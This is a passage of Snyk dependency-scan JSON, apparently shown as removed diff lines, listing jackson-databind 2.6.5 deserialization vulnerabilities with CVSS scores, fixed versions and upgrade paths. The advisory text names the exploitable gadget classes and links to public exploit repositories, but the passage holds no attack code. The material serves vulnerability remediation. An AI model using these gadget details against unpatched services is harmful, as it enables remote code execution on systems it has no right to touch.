"2024-03-06T14:04:45.683422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.97607", - "probability": "0.53288", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12384" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mph4-vhrx-mv67" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-25T10:06:54.889582Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-28T10:27:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - 
"maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-25T10:26:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.734463Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2387", - "title": 
"GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.033731Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
`SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.83638", - "probability": "0.00984", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14379" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": 
"2019-07-29T14:55:33.030000Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.502907Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": 
false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2449", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.808389Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", - "epssDetails": { - "percentile": "0.71702", - "probability": "0.00342", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16335" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-85cw-hj65-qqv9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:06.837179Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:30:24Z", 
- "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:30:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.931793Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "credit": [ - "iSafeBlue" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - 
"url": "https://github.com/FasterXML/jackson-databind/issues/2410", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.892322Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", - "epssDetails": { - "percentile": "0.74104", - "probability": "0.00410", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14540" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h822-r4r5-v8jg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:10.401907Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:27:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - 
"artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:27:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.008832Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2420", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-06T13:58:32.899468Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
